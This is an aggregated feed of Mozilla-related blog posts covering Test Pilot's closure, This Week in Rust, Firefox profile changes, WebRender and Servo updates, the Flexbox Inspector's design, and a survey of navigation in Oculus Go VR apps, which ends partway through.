Since the beginning of the Test Pilot program, we’ve built or helped build a number of popular Firefox features. Activity Stream, which now features prominently on the Firefox homepage, was in the first round of Test Pilot experiments. Activity Stream brought new life to an otherwise barren page and made it easier to recall and discover new content on the web. The Test Pilot team continued to draw the attention of the press and users alike with experiments like Containers, which paved the way for our highly successful Facebook Container. Send made private, encrypted file sharing as easy as clicking a button. Lockbox helped you take your Firefox passwords to iOS devices (and soon to Android). Page Shot started as a simple way to capture and share screenshots in Firefox; we shipped it as the feature now known as Screenshots, and we have since added our new approach to anti-tracking, which also first gained traction as a Test Pilot experiment.

So what’s next?

Test Pilot performed better than we could have ever imagined. As a result of this program we’re now in a stronger position where we are using the knowledge that we gained from small groups, evangelizing the benefits of rapid iteration, taking bold (but safe) risks, and putting the user front and center.

We’re applying these valuable lessons not only to continued product innovation, but also to how we test and ideate across the Firefox organization. So today, we are announcing that we will be moving to a new structure that will demonstrate our ability to innovate in exciting ways and as a result we are closing the Test Pilot program as we’ve known it.

More user input, more testing

Migrating to a new model doesn’t mean we’re doing fewer experiments. In fact, we’ll be doing even more! The innovation processes that led to products like Firefox Monitor are no longer the responsibility of a handful of individuals but rather the entire organization. Everyone is responsible for maintaining the Culture of Experimentation Firefox has developed through this process. These techniques and tools have become a part of our very DNA and identity. That is something to celebrate. As such, we won’t be uninstalling any experiments you’re using today. In fact, many of the Test Pilot experiments and features will find their way to Addons.Mozilla.Org, while others like Send and Lockbox will continue to take in more input from you as they evolve into standalone products.

We couldn’t do it without you

We want to thank Firefox users for their input and support of product features and functionality testing through the Test Pilot Program. We look forward to continuing to work closely with our users who are the reason we build Firefox in the first place. In the coming months look out for news on how you can get involved in the next stage of our experimentation.

In the meantime, the Firefox team will continue to focus on the next release and what we’ll be developing in the coming year, while other Mozillians chug away at developing equally exciting and user-centric product solutions and services. You can get a sneak peek at some of these innovations at Mozilla Labs, which touches everything from voice capability to IoT to AR/VR.

And so we say goodbye and thank you to Test Pilot for helping us usher in a bright future of innovation at Mozilla.

The post Evolving Firefox’s Culture of Experimentation: A Thank You from the Test Pilot Program appeared first on The Mozilla Blog.

This Week In Rust - This Week in Rust 269

Hello and welcome to another issue of This Week in Rust! Rust is a systems language pursuing the trifecta: safety, concurrency, and speed. This is a weekly summary of its progress and community. Want something mentioned? Tweet us at @ThisWeekInRust or send us a pull request. Want to get involved? We love contributions.

This Week in Rust is openly developed on GitHub. If you find any errors in this week's issue, please submit a PR.

Updates from Rust Community

News & Blog Posts

#Rust2019

Find all #Rust2019 posts at Read Rust.

Crate of the Week

This week's crate is ropey, an editable text buffer data structure. Thanks to Vikrant Chaudhary for the suggestion!

Submit your suggestions and votes for next week!

Call for Participation

Always wanted to contribute to open-source projects but didn't know where to start? Every week we highlight some tasks from the Rust community for you to pick and get started!

Some of these tasks may also have mentors available, visit the task page for more information.

If you are a Rust project owner and are looking for contributors, please submit tasks here.

Updates from Rust Core

189 pull requests were merged in the last week

Approved RFCs

Changes to Rust follow the Rust RFC (request for comments) process. These are the RFCs that were approved for implementation this week:

No RFCs were approved this week.

Final Comment Period

Every week the team announces the 'final comment period' for RFCs and key PRs which are reaching a decision. Express your opinions now.

RFCs
Tracking Issues & PRs

New RFCs

Upcoming Events

Online
Asia
Europe
North America
South America

If you are running a Rust event please add it to the calendar to get it mentioned here. Please remember to add a link to the event too. Email the Rust Community Team for access.

Rust Jobs

Tweet us at @ThisWeekInRust to get your job offers listed here!

Quote of the Week

Right. I've never even used this impl, but my first thought upon seeing the question "I have an Iterator of X and need a Y" was to look at the FromIterator impls of Y.

If that impl didn't exist, I'd then look for the following:

  • Other FromIterator<X> impls for String to see if any of those X can easily be produced from char (and then I would call map before .collect()).
  • impl FromIterator<char> for Vec<u8>. If this existed I would use String::from_utf8(iterator.collect()).
  • impl Add<char> for String. If this existed, I would use .fold(String::new(), |s, c| s + c)
  • methods of char to see if there's anything that lets you obtain the UTF-8 bytes. Indeed, there is encode_utf8, which even gives a &mut str, so one can write .fold(String::new(), |s, c| { let mut buffer = [0u8; 4]; s += &*c.encode_utf8(&mut buffer); s })
  • idly check the inherent methods of String for whatever pops out at me

and if I could still find nothing after all of that I'd slam my head into a wall somewhere.

– Michael Lamparski on rust-users

Thanks to Cauê Baasch De Souza for the suggestion!

Please submit your quotes for next week!

This Week in Rust is edited by: nasa42, llogiq, and Flavsditz.

Discuss on r/rust.

Firefox Nightly - Moving to a Profile per Install Architecture

With Firefox 67 you’ll be able to run different Firefox installs side by side by default.

Supporting profiles per installation is a feature that has been requested by pre-release users for a long time now and we’re pleased to announce that starting with Firefox 67 users will be able to run different installs of Firefox side by side without needing to manage profiles.

What are profiles?

Firefox saves information such as bookmarks, passwords and user preferences in a set of files called your profile. This profile is stored in a location separate from the Firefox program files.

More details on profiles can be found here.

What changes are we making to profiles in Firefox 67?

Previously, all Firefox versions shared a single profile by default. With Firefox 67, Firefox will begin using a dedicated profile for each Firefox version (including Nightly, Beta, Developer Edition, and ESR). This will make Firefox more stable when switching between versions on the same computer and will also allow you to run different Firefox installations at the same time:

  • You have not lost any personal data or customizations. Any previous profile data is saved and associated with the first Firefox installation that was opened after this change.
  • Starting with Firefox 67, Firefox installations will now have separate profiles. This will apply to Nightly 67 initially and then to all versions of release 67 and above as the change makes its way to Developer Edition, Beta, Firefox, and ESR.

What are my options?

If you do nothing, your profile data will be different on each version of Firefox.

If you would like the information you save to Firefox to be the same on all versions, you can use a Firefox Account to keep them in sync.

Sync is the easiest way to make your profiles consistent on all of your versions of Firefox. You also get additional benefits like sending tabs and secure password storage. Get started with Sync here.

You will not lose any personal data or customizations. Any previous profile data is safe and attached to the first Firefox installation that was opened after this change.

Users of only one Firefox install, and users of multiple Firefox installs who had already set up different profiles for different installations, will not notice the change.

We really hope that this change will make it simpler for Firefox users to start running Nightly. If you come across a bug or have any suggestions we really welcome your input through our support channels.

What if I already use separate profiles for my different Firefox installations?

Users who have already manually created separate profiles for different installations will not notice the change (this has been the advised procedure on Nightly for a while).

Cameron Kaiser - TenFourFox FPR12b1 available

TenFourFox Feature Parity 12 beta 1 is now available (downloads, hashes, release notes). As before, this is a smaller-scope release with no new features, just fixes and improvements. The big changes are a fix for CVE-2018-12404, a holdover security fix from FPR11 that also helps improve JavaScript optimization, and Raphael's hand-coded assembly language AltiVec-accelerated string matching routines with special enhancements for G5 systems. These replace the C routines I wrote using AltiVec intrinsics, which will be removed from our hacked NSPR libc source code once his versions stick.

Unfortunately, we continue to accumulate difficult-to-solve JavaScript bugs. The newest one is issue 541, which affects GitHub most severely and is hampering my ability to use the G5 to work in the interface. This one could be temporarily repaired with some ugly hacks and I'm planning to look into that for FPR13, but I don't have this proposed fix in FPR12 since it could cause parser regressions and more testing is definitely required. However, the definitive fix is the same one needed for the frustrating issue 533, i.e., the new frontend bindings introduced with Firefox 51. I don't know if I can do that backport (both with respect to the technical issues and the sheer amount of time required), but it's increasingly looking like it's necessary for full functionality and it may be more than I can personally manage.

Meanwhile, FPR12 is scheduled for parallel release with Firefox 60.5/65 on January 29. Report new issues in the comments (as always, please verify the issue doesn't also occur in FPR11 before reporting a new regression, since sites change more than our core does).

The Servo Blog - This Week In Servo 123

In the past three weeks, we merged 72 PRs in the Servo organization’s repositories.

Congratulations to dlrobertson for their new reviewer status for the ipc-channel library!

Planning and Status

Our roadmap is available online. Plans for 2019 will be published soon.

This week’s status updates are here.

Exciting works in progress

Notable Additions

  • nox improved the web compatibility of the MIME type parser.
  • Manishearth removed some blocking behaviour from the WebXR implementation.
  • Collares implemented the ChannelSplitterNode WebAudio API.
  • makepost added musl support to the ipc-channel crate.
  • aditj implemented several missing APIs for the resource timing standard.
  • dlrobertson exposed the HTMLTrackElement API.
  • ferjm added support for backoff to the media playback implementation.
  • jdm implemented the missing source API for message events.
  • ferjm improved the compatibility of the media playback DOM integration.
  • germangc implemented missing DOM APIs for looping and terminating media playback.

New Contributors

Interested in helping build a web browser? Take a look at our curated list of issues that are good for new contributors!

Hacks.Mozilla.Org - Designing the Flexbox Inspector

Screenshot showing the Flex highlighter, Flex Container pane, and Flex Item pane

The new Flexbox Inspector, created by Firefox DevTools, helps developers understand the sizing, positioning, and nesting of Flexbox elements. You can try it out now in Firefox DevEdition or join us for its official launch in Firefox 65 on January 29th.

The UX challenges of this tool have been both frustrating and a lot of fun for our team. Built on the basic concepts of the CSS Grid Inspector, we sought to expand on the possibilities of what a design tool could be. I’m excited to share a behind-the-scenes look at the UX patterns and processes that drove our design forward.

Research and ideation

CSS Flexbox is an increasingly popular layout model that helps in building robust dynamic page layouts. However, it has a big learning curve—at the beginning of this project, our team wasn’t sure if we understood Flexbox ourselves, and we didn’t know what the main challenges were. So, we gathered data to help us design the basic feature set.

Our earliest research on design-focused tools included interviews with developer/designer friends and community members who told us they wanted to understand Flexbox better.

We also ran a survey to rank the Flexbox features folks most wanted to see. Min/max width and height constraints received the highest score. The ranking of shrink/grow features was also higher than we expected. This greatly influenced our plans, as we had originally assumed these more complicated features could wait for a version 2.0. It was clear however that these were the details developers needed most.

Flexbox survey results

Most of the early design work took the form of spirited brainstorming sessions in video chat, text chat, and email. We also consulted the experts: Daniel Holbert, our Gecko engine developer who implemented the Flexbox spec for Firefox; Dave Geddes, CSS educator and creator of the Flexbox Zombies course; and Jen Simmons, web standards champion and designer of the Grid Inspector.

The discussions with friendly and passionate colleagues were among the best parts of working on this project. We were able to deep-dive into the meaty questions, the nitty-gritty details, and the far-flung ideas about what could be possible. As a designer, it is amazing to work with developers and product managers who care so much about the design process and have so many great UX ideas.

Visualizing a new layout model

After our info-gathering, we worked to build our own mental models of Flexbox.

While trying to learn Flexbox myself, I drew diagrams that show its different features.

Early Flexbox diagram

My colleague Gabriel created a working prototype of a Flexbox highlighter that greatly influenced our first launch version of the overlay. It’s a monochrome design similar to our Grid Inspector overlay, with a customizable highlight color to make it clearly visible on any website.

We use a dotted outline for the container, solid outlines for items, and diagonal shading between the items to represent the free space created by justify-content and margins.

NYTimes header with Flexbox overlay

Youtube header with Flexbox overlay

We got more adventurous with the Flexbox pane inside DevTools. The flex item diagram (or “minimap” as we love to call it) shows a visualization of basis, shrink/grow, min/max clamping, and the final size, with each attribute appearing only if it’s relevant to the layout engine’s sizing decisions.

Flex item diagram

Many other design ideas, such as these flex container diagrams, didn’t make it into the final MVP, but they helped us think through the options and may get incorporated later.

Early container diagram design

Color-coded secrets of the rendering engine

With help from our Gecko engineers, we were able to display a chart with step-by-step descriptions of how a flex item’s size is determined. Basic color-coding between the diagram and chart helps to connect the two UIs.

Flex item sizing steps
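To give a feel for what those steps compute, here is a deliberately simplified sketch of how a single item’s main size falls out of basis, grow/shrink, and min/max clamping. It is an illustration of the concepts the chart explains, not the Inspector’s or Gecko’s actual code, and it glosses over the re-resolution the real algorithm performs when clamping frees up or absorbs space.

```typescript
interface FlexItemInput {
  flexBasis: number; // resolved flex-basis, in px
  flexGrow: number;
  flexShrink: number;
  minSize: number;   // resolved min main size, in px
  maxSize: number;   // resolved max main size, in px (Infinity if none)
}

function clamp(value: number, min: number, max: number): number {
  return Math.min(Math.max(value, min), max);
}

// freeSpace: the container's main size minus the sum of all flex bases.
// growSum: sum of flexGrow across the items in the line.
// scaledShrinkSum: sum of (flexShrink * flexBasis) across the items in the line.
function finalMainSize(
  item: FlexItemInput,
  freeSpace: number,
  growSum: number,
  scaledShrinkSum: number
): number {
  let size = item.flexBasis;
  if (freeSpace > 0 && growSum > 0) {
    // Positive free space is handed out in proportion to flex-grow.
    size += freeSpace * (item.flexGrow / growSum);
  } else if (freeSpace < 0 && scaledShrinkSum > 0) {
    // Negative space is absorbed in proportion to flex-shrink weighted by
    // basis, so larger items give up more pixels.
    size += freeSpace * ((item.flexShrink * item.flexBasis) / scaledShrinkSum);
  }
  // Min/max clamping is applied last, which is why a grown or shrunk size
  // can still be overridden in the final step.
  return clamp(size, item.minSize, item.maxSize);
}
```

This ordering is also why the diagram only surfaces an attribute when it actually influenced the result: clamping is the last step and is often a no-op.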

Markup badges and other entry points

Flex badges in the markup view serve as indicators of flex containers as well as shortcuts for turning on the in-page overlay. Early data shows that this is the most common way to turn on the overlay; the toggle switch in the Layout panel and the button next to the display:flex declaration in Rules are two other commonly used methods. Having multiple entry points accommodates different workflows, which may focus on any one of the three Inspector panels.

Flex badges in the markup view

Surfacing a brand new tool

Building new tools can be risky due to the presumption of modifying developers’ everyday workflows. One of my big fears was that we’d spend countless hours on a new feature only to hide it away somewhere inside the complicated megaplex that is Firefox Developer Tools. This could result in people never finding it or not bothering to navigate to it.

To invite usage, we automatically show Flexbox info in the Layout panel whenever a developer selects a flex container or item inside the markup view. The Layout panel will usually be visible by default in the third Inspector column which we added in Firefox 62. From there, the developer can choose to dig deeper into flex visualizations and relationships.

Showing the Flexbox info automatically when selecting a Flex element

Mobile-inspired navigation & structure

One new thing we’re trying is a page-style navigation in which the developer goes “forward a page” to traverse down the tree (to child elements), or “back a page” to go up the tree (to parent elements). We’re also making use of a select menu for jumping between sibling flex items. Inspired by mobile interfaces, the Firefox hamburger menu, and other page-style UIs, it’s a big experimental departure from the simpler navigation normally used in DevTools.

Page-like navigation

One of the trickier parts of the structure was coming up with a cohesive design for flex containers, items, and nested container-items. My colleague Patrick figured out that we should have two types of flex panes inside the Layout panel, showing whichever is relevant: an Item pane or a Container pane. Both panes show up when the element is both a container and an item.

Layout panel showing flex container and item info

Tighter connection with in-page context

When hovering over element names inside the Flexbox panes, we highlight the element in the page, strengthening the connection between the code and the output without including extra ‘inspect’ icons or other steps. I plan to introduce more of this type of intuitive hover behavior into other parts of DevTools.

Hovering over a flex item name which triggers a highlight in the page

Testing and development

After lots of iteration, I created a high-fidelity prototype to share with our community channels. We received lots of helpful comments that fed back into the design.

Different screens in the Flexbox Inspector prototype

We had our first foray into formal user testing, which was helpful in revealing the confusing parts of our tool. We plan to continue improving our user research process for all new projects.

User testing video

UserTesting asks participants to record their screens and think aloud as they try out software

Later this month, developers from our team will be writing a more technical deep-dive about the Flexbox Inspector. Meanwhile, here are some fun tidbits from the dev process: Lots and lots of issues were created in Bugzilla to organize every implementation task of the project. Silly test pages, like this one, created by my colleague Mike, were made to test out every Flexbox situation. Our team regularly used the tool in Firefox Nightly with various sites to dog-food the tool and find bugs.

What’s next

2018 was a big year for Firefox DevTools and the new Design Tools initiative. There were hard-earned lessons and times of doubt, but in the end, we came together as a team and we shipped!

We have more work to do in improving our UX processes, stepping up our research capabilities, and understanding the results of our decisions. We have more tools to build—better debugging tools for all types of CSS layouts and smoother workflows for CSS development. There’s a lot more we can do to improve the Flexbox Inspector, but it’s time for us to put it out into the world and see if we can validate what we’ve already built.

Now we need your help. It’s critical that the Flexbox Inspector gets feedback from real-world usage. Give it a spin in DevEdition, and let us know via Twitter or Discourse if you run into any bugs, ideas, or big wins.

____

Thanks to Martin Balfanz, Daniel Holbert, Patrick Brosset, and Jordan Witte for reviewing drafts of this article.

The post Designing the Flexbox Inspector appeared first on Mozilla Hacks - the Web developer blog.

Mozilla GFX - WebRender newsletter #35

Bonsoir! Another week, another newsletter. I stealthily published WebRender on crates.io this week. This doesn’t mean anything in terms of API stability and whatnot, but it makes it easier for people to use WebRender in their own rust projects. Many asked for it so there it is. Everyone is welcome to use it, find bugs, report them, submit fixes and improvements even!

In other news we are initiating a notable workflow change: WebRender patches will land directly in Firefox’s mozilla-central repository and a bot will automatically mirror them on GitHub. This change mostly affects the gfx team. What it means for us is that testing WebRender changes becomes a lot easier, as we don’t have to manually import every single work-in-progress commit to test it against Firefox’s CI anymore. Also, Kats won’t have to spend a considerable amount of his time porting WebRender changes to mozilla-central anymore.
We know that interacting with mozilla-central can be intimidating for external contributors, so we’ll still accept pull requests on the GitHub repository, although instead of merging them from there, someone on the gfx team will import them into mozilla-central manually (which we already had to do for non-trivial patches in order to run them against CI before merging). So for anyone who doesn’t work every day on WebRender, this workflow change is pretty much cosmetic. You are still welcome to keep following and interacting with the GitHub repository.

Notable WebRender and Gecko changes

  • Jeff fixed a recent regression that was causing blob images to be painted twice.
  • Kats completed the work to make the repository transition possible without losing any of the tools and testing we have in WebRender. He also set up the repository synchronization.
  • Kvark completed the clipping API saga.
  • Matt added some new telemetry for paint times, that take vsync into account.
  • Matt fixed a bug with a telemetry probe that was mixing content and UI paint times.
  • Andrew fixed an image flickering issue.
  • Andrew fixed a bug with image decode size and pixel snapping.
  • Lee fixed a crash in DWrite font rasterization.
  • Lee fixed a bug related to transforms and clips.
  • Emilio fixed a bug with clip path and nested clips.
  • Glenn fixed caching of fixed-position clips.
  • Glenn improved the cached tile eviction heuristics (2).
  • Glenn fixed an intermittent test failure.
  • Glenn fixed caching with opacity bindings that are values.
  • Glenn avoided caching tiles that always change.
  • Glenn fixed a cache eviction issue.
  • Glenn added a debugging overlay for picture caching.
  • Nical reduced the overdraw when rendering dashed corners, which was causing freezes in extreme cases.
  • Nical added the possibility to run wrench/scripts/headless.py (which lets us run CI under os-mesa) inside gdb, cgdb, rust-gdb and rr both with release and debug builds (see Debugging WebRender on wiki for more info about how to set this up).
  • Nical fixed a blob image key leak.
  • Sotaro fixed the timing of async animation deletion which addressed bug 1497852 and bug 1505363.
  • Sotaro fixed a cache invalidation issue when the number of blob rasterization requests hits the per-transaction limit.
  • Doug cleaned up WebRenderLayerManager’s state management.
  • Doug fixed a lot of issues in WebRender when using multiple documents at the same time.

Ongoing work

The team keeps going through the remaining blockers (19 P2 bugs and 34 P3 bugs at the time of writing).

Enabling WebRender in Firefox Nightly

In about:config, set the pref “gfx.webrender.all” to true and restart the browser.

Reporting bugs

The best place to report bugs related to WebRender in Firefox is the Graphics :: WebRender component in bugzilla.
Note that it is possible to log in with a github account.

The Mozilla Blog - Eric Rescorla Wins the Levchin Prize at the 2019 Real-World Crypto Conference

The Levchin Prize awards two entrepreneurs every year for significant contributions to solving global, real-world cryptography issues that make the internet safer at scale. This year, we’re proud to announce that our very own Firefox CTO, Eric Rescorla, was awarded one of these prizes for his involvement in spearheading the latest version of Transport Layer Security (TLS). TLS 1.3 incorporates significant improvements in both security and speed, and was completed in August and already secures 10% of sites.

Eric has contributed extensively to many of the core security protocols used in the internet, including TLS, DTLS, WebRTC, ACME, and the in-development IETF QUIC protocol. Most recently, he was editor of TLS 1.3, which already secures 10% of websites despite having been finished for less than six months. He also co-founded Let’s Encrypt, a free and automated certificate authority that now issues more than a million certificates a day, in order to remove barriers to online encryption, and helped HTTPS grow from around 30% of the web to around 75%. Previously, he served on the California Secretary of State’s Top To Bottom Review, where he was part of a team that found severe vulnerabilities in multiple electronic voting devices.

The 2019 winners were selected by the Real-World Cryptography conference steering committee, which includes professors from Stanford University, University of Edinburgh, Microsoft Research, Royal Holloway University of London, Cornell Tech, University of Florida, University of Bristol, and NEC Research.

This prize was announced on January 9th at the 2019 Real-World Crypto Conference in San Jose, California. The conference brings together cryptography researchers and developers who are implementing cryptography on the internet, the cloud and embedded devices from around the world. The conference is organized by the International Association of Cryptologic Research (IACR) to strengthen and advance the conversation between these two communities.

For more information about the Levchin Prize visit www.levchinprize.com.

The post Eric Rescorla Wins the Levchin Prize at the 2019 Real-World Crypto Conference appeared first on The Mozilla Blog.

Mozilla Open Policy & Advocacy Blog - Our Letter to Congress About Facebook Data Sharing

Last week Mozilla sent a letter to the House Energy and Commerce Committee concerning its investigation into Facebook’s privacy practices. We believe Facebook’s representations to the Committee — and more recently — concerning Mozilla are inaccurate and wanted to set the record straight about any past and current work with Facebook. You can read the full letter here.

The post Our Letter to Congress About Facebook Data Sharing appeared first on Open Policy & Advocacy.

The Mozilla Blog - Mozilla Announces Deal to Bring Firefox Reality to HTC VIVE Devices

Last year, Mozilla set out to build a best-in-class browser that was made specifically for immersive browsing. The result was Firefox Reality, a browser designed from the ground up to work on virtual reality headsets. To kick off 2019, we are happy to announce that we are partnering with HTC VIVE to power immersive web experiences across Vive’s portfolio of devices.

What does this mean? It means that Vive users will enjoy all of the benefits of Firefox Reality (such as its speed, power, and privacy features) every time they open the Vive internet browser. We are also excited to bring our feed of immersive web experiences to every Vive user. There are so many amazing creators out there, and we are continually impressed by what they are building.

“This year, Vive has set out to bring everyday computing tasks into VR for the first time,” said Michael Almeraris, Vice President, HTC Vive. “Through our exciting and innovative collaboration with Mozilla, we’re closing the gap in XR computing, empowering Vive users to get more content in their headset, while enabling developers to quickly create content for consumers.”

Virtual reality is one example of how web browsing is evolving beyond our desktop and mobile screens. Here at Mozilla, we are working hard to ensure these new platforms can deliver browsing experiences that provide users with the level of privacy, ease-of-use, and control that they have come to expect from Firefox.

In the few months since we released Firefox Reality, we have already released several new features and improvements based on the feedback we’ve received from our users and content creators. In 2019, you will see us continue to prove our commitment to this product and our users with every update we provide.

Stay tuned to our mixed reality blog and twitter account for more details. In the meantime, you can check out all of the announcements from HTC Vive here.

If you have an all-in-one VR device running Vive Wave, you can search for “Firefox Reality” in the Viveport store to try it out right now.

The post Mozilla Announces Deal to Bring Firefox Reality to HTC VIVE Devices appeared first on The Mozilla Blog.

This Week In Rust - This Week in Rust 268

Hello and welcome to another issue of This Week in Rust! Rust is a systems language pursuing the trifecta: safety, concurrency, and speed. This is a weekly summary of its progress and community. Want something mentioned? Tweet us at @ThisWeekInRust or send us a pull request. Want to get involved? We love contributions.

This Week in Rust is openly developed on GitHub. If you find any errors in this week's issue, please submit a PR.

Updates from Rust Community

News & Blog Posts

#Rust2019

Find all #Rust2019 posts at Read Rust.

Crate of the Week

This week's crate is gfx-hal, a hardware abstraction layer for gfx-rs. Thanks to Vikrant Chaudhary for the suggestion!

Submit your suggestions and votes for next week!

Call for Participation

Always wanted to contribute to open-source projects but didn't know where to start? Every week we highlight some tasks from the Rust community for you to pick and get started!

Some of these tasks may also have mentors available, visit the task page for more information.

If you are a Rust project owner and are looking for contributors, please submit tasks here.

Updates from Rust Core

166 pull requests were merged in the last week

Approved RFCs

Changes to Rust follow the Rust RFC (request for comments) process. These are the RFCs that were approved for implementation this week:

No RFCs were approved this week.

Final Comment Period

Every week the team announces the 'final comment period' for RFCs and key PRs which are reaching a decision. Express your opinions now.

RFCs
Tracking Issues & PRs

New RFCs

Upcoming Events

Online
Europe
North America

If you are running a Rust event please add it to the calendar to get it mentioned here. Please remember to add a link to the event too. Email the Rust Community Team for access.

Rust Jobs

Tweet us at @ThisWeekInRust to get your job offers listed here!

Quote of the Week

The name Rust suggests what it is: a thin layer on top of the metal.

– c3534l on reddit

Thanks to Cauê Baasch De Souza for the suggestion!

Please submit your quotes for next week!

This Week in Rust is edited by: nasa42, llogiq, and Flavsditz.

Discuss on r/rust.

Mozilla VR Blog - Navigation Study for 3DoF Devices


Over the past few months I’ve been building VR demos and writing tutorial blogs. Navigation on a device with only three degrees of freedom (3DoF) is tricky, so I decided to do a survey of many native apps and games for the Oculus Go to see how each of them handled it. Below are my results.

For this study I looked only at navigation, meaning how the user moves around in the space, either by directly moving or by jumping to semantically different spaces (ex: click a door to go to the next room). I don't cover other interactions like how buttons or sliders work. Just navigation.

TL;DR

Don’t touch the camera. The camera is part of the user’s head. Don’t try to move it. All apps which move the camera induce some form of motion sickness. Instead use one of a few different forms of teleportation, always under user control.

The ideal control for me was teleportation to semantically meaningful locations, not just 'forward ten steps'. Furthermore, when presenting the user with a full 360 environment it is helpful to have a way to recenter the view, such as by using left/right buttons on the controller. Without a recentering option the user will have to physically turn themselves around, which is cumbersome unless you are in a swivel chair.

To help complete the illusion I suggest subtle sound effects for movement, selection, and recentering. Just make sure they aren't very noticeable.
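As a concrete illustration of the recentering advice above, the usual trick is to parent the head-tracked camera to a rig and rotate only the rig, in fixed increments and without animation, so the user never perceives motion they did not make themselves. The names below are hypothetical, not taken from any of the apps reviewed here.

```typescript
// Illustrative snap-turn helper for a 3DoF headset. The head-tracked camera
// sits inside a rig object; we rotate the rig, never the camera itself.
interface CameraRig {
  yawRadians: number; // extra rotation applied around the vertical axis
}

const SNAP_INCREMENT = (45 * Math.PI) / 180; // 45 degrees per swipe

// Call this from the controller's left/right swipe (or button) handler.
function snapTurn(rig: CameraRig, direction: "left" | "right"): void {
  rig.yawRadians += direction === "left" ? SNAP_INCREMENT : -SNAP_INCREMENT;
  // Playing a quiet click here helps the jump feel intentional without
  // becoming noticeable, per the note about subtle sound effects.
}
```

Several of the apps below (Starchart, Lands End, World of Wonders) implement essentially this pattern with instant 45-degree or left/right view adjustments.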

Epic Roller Coaster

This is a roller coaster simulator, except it lets you do things that a real roller coaster can’t, such as jumping between tracks and being chased by dinosaurs. To start you have pointer interaction across three panels: left, center, right. Everything has hover/rollover effects with sound. During the actual roller coaster ride you are literally a camera on rails. Press the trigger to start and then the camera moves at a constant speed. All you can do is look around. Speed and angle changes made me dizzy and I had to take it off after about five minutes, but my 7-year-old loves Epic Roller Coaster.

Space Time

A PBS app that teaches you about black holes, the speed of light, and other physics concepts. You use pointer interaction to click buttons then watch non-interactive 3D scenes/info, though they are in full 360 3D, rather than plain movies.

Within Videos

A collection of many 360 and 3D movies. Pointer interaction to pick videos, some scrolling w/ touch gestures. Then non-interactive videos except for the video controls.

Master Work Journeys

Explore famous monuments and locations like Mount Rushmore. You can navigate around 360 videos by clicking on hotspots with the pointer. Some trigger photos or audio. Others are teleportation spots. There is no free navigation or free teleportation, only to the hotspots. You can adjust the camera with left and right swipes, though.

Thumper

An intense driving and tilting music game. It uses pointer control for menus. In the game you run at a constant speed. The track itself turns but you are always stable in the middle. Particle effects stream at you, reinforcing the illusion of the tube you are in.

Bait

A fishing simulator. You use pointer clicks for navigation in the menus. The main interaction is a fishing pole. Hold and then release the button at the right time while flicking the pole forward to cast, then click to reel it back in.

Dinosaurs

Basically like the roller coaster game, but you learn about various dinosaurs by riding a constant-speed rail car to different scenes. It felt better to me than Epic Roller Coaster because the velocity is constant, rather than changing.

Breaking Boundaries in Science

Text overlays with audio and a 360 background image. You can navigate through full 3D space by jumping to hard-coded teleport spots. You can click certain spots to get to these points, hear audio, and lightly interact with artifacts. If you look up at an angle you see a flip-180 button to change the view. This avoids the problem of having to be in a 360 chair to navigate around. You cannot adjust the camera with left/right swipes.

WonderGlade

In every scene you float over a static mini-landscape, sort of like you are above a game board. You cannot adjust the angle or camera, just move your head to see stuff. Everything is laid out around you for easy viewing from the fixed camera point. Individual mini games may use different mechanics for playing, but they all use the same camera. Essentially the camera and world never move. You can navigate your player character around the board by clicking on spots, similar to an RTS like Starcraft.

Starchart

Menus are a static camera view with mouse interaction. Once inside a star field you are at the center and can look in any direction of the virtual night sky. Swipe left or right to rotate the camera 45 degrees; this happens instantly, not as an animated move, though there are sound effects.
Click on a star or other object in the sky to get more info. The info appears attached to your controller. Rotate your thumb on the touch area to get different info on the object. The info includes a model of the object: either a full 3D model of a star or planet, or a 2D image of a galaxy, etc.

Lila’s Tail

Mouse menu interaction. In-game, the level is a maze mapped onto a cylinder surrounding you. You click to guide Lila through the maze; sometimes she must slide from one side across the center to the other. You guide her and the spotlight with your gaze. You activate things by connecting dots with the pointer. There is no way I can see to adjust the camera. This is a bit annoying in the levels which require you to navigate a full 360 degrees. I really wish it had recentering.

Overworld Underlord

A mini RTS / tower defense game. The camera is at a fixed position above the board. The boards are designed to lie around the camera, so you turn left or right to see the whole board. Control your units by clicking on them and then clicking a destination.

Claro

A puzzle game where you lightly move things around to complete a sunlight-reflecting mechanism. The camera is fixed and the board is always an object in front of you. You rotate the board with left/right swipes on the touchpad. You move the sun by holding the trigger and moving the pointer around. Menus use mouse cursor navigation. The board is always in front of you, but extra info like the level you are on and your score is to the left or right of you. Interestingly these are positioned far enough to the sides that you won’t see the extra info while solving a puzzle. Very nice. You are surrounded by a pretty skybox that changes colors as the sun moves.

Weaver

Weaver is a 360 photo viewer that uses a gaze cursor to navigate. Within a photo you cannot move around, just rotate your head. If you look down, a floating menu appears to go to the next photo or the main menu.

Ocean Rift

This is a nice underwater simulation of a coral reef. Use the pointer for menus and navigate around undersea with the controller. The camera moves fairly slowly but does have some acceleration, which made me a little sick. No camera rotation or recentering, just turn your head.

Fancy Beats

Rhythm game. Lights on the game board make it look like you are moving forward with your bowling ball, or that the board is moving backward. Either way it’s at a constant speed. Use touchpad interactions to control your ball to the beat.

Endspace

In Endspace you fly a space fighter into battle. There is a static cockpit around you and it uses head direction to move the camera around. The controller is used to aim the weapon. I could only handle this for about 60 seconds before I started to feel sick. Basically everything is moving around you constantly in all directions, so I immediately started to feel floaty.

Lands End

You navigate by jumping to teleportation spots using a gaze cursor. When you teleport, the camera moves to the new spot at a constant velocity. Because movement is slow and the horizon is level I didn’t get too queasy, but it’s still not as great as instant teleportation. On the other hand, instant teleporting might make it hard to know where you just moved to. Losing spatial context would be bad in this game. You can rotate your view using left and right swipes.

Jurassic World Blue

This is a high-resolution 360 movie following a dinosaur from the newest Jurassic Park movie. The camera is generally fixed, though it sometimes moves very slowly along a line to take you towards the action. I never experienced any dizziness from the movement.

Dark Corner

Spooky short films in full 360. In the one I watched, The Office, the camera did not move at all, though things did sometimes come from angles away from where they knew the viewer would be looking. This is a very clever way to do jump scares without controlling the camera.

Maze VR Ultimate Pathfinding

You wander around a maze trying to find the exit. I found the control scheme awkward. You walk forward in whatever direction you gaze in for more than a moment, or when you press a button on the controller. The direction is always controlled by your gaze, however. The movement speed goes from stationary to full speed over a second or so. I would have preferred to not have the ramp-up time. Also, you can’t click left or right on the controller trackpad to shift the view. I’m guessing this was originally built for Cardboard or similar devices.

Dead Shot

A zombie shooter. The Oculus Store has several of these. Dead Shot has both a comfort mode and a regular mode. In regular mode the camera does move, but at a slow and steady pace that didn’t give me any sickness. In comfort mode the camera never moves. Instead it teleports to the new location, including a little eyeblink animation for the transition. Nicely done! To make sure you don’t get lost it only teleports to nearby locations you can see.

Pet Lab

